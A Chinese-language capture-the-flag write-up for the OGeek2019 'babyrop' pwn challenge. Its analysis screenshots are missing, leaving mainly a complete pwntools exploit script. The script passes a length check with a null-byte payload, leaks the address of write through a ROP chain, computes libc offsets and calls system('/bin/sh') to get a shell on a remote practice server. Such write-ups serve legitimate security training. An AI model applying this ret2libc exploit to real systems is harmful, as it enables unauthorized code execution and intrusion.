PWN手的成长之路-16-OGeek2019-babyrop

file：

checksec：
32位+RELRO（重定位）+NX（数据执行保护，栈不可执行）

查看main函数：

查看 sub_80486BB 函数：

查看 sub_804871F 函数：

查看 sub_80487D0 函数：

exp：

from pwn import *
#from LibcSearcher import *

#start
r=remote('node5.buuoj.cn',26084)
elf = ELF('./pwn')
libc=ELF('libc-2.23.so')
context.log_level='debug'

#params
ret_addr = 0x8048502
write_got = elf.got['write']
write_plt = elf.plt['write']
sub_addr = 0x080487D0
#main_addr = 0x8048825

#attack1
#payload = b'\0' + b'a'*6 + bytes([255])
payload = b'\x00' + b'a'*6 + b'\xff'
r.sendline(payload)
r.recvuntil(b'Correct')

#attack2
payload2 = b'a'*(0xe7+4) + p32(write_plt) + p32(sub_addr) + p32(1) + p32(write_got) + p32(4)
r.sendline(payload2)

data_now = r.recv(timeout=1)    #清理缓冲区中多余的输出数据

write_addr = u32(r.recvn(4, timeout=5))
print("write_addr =", hex(write_addr))

#libc
base_addr = write_addr - libc.symbols['write']
system_addr = base_addr + libc.symbols['system']
binsh_addr = base_addr + next(libc.search(b'/bin/sh'))

#attack2
payload3 = b'a'*(0xe7+4) + p32(system_addr) + b'a'*4 + p32(binsh_addr)
r.sendline(payload3)
r.interactive()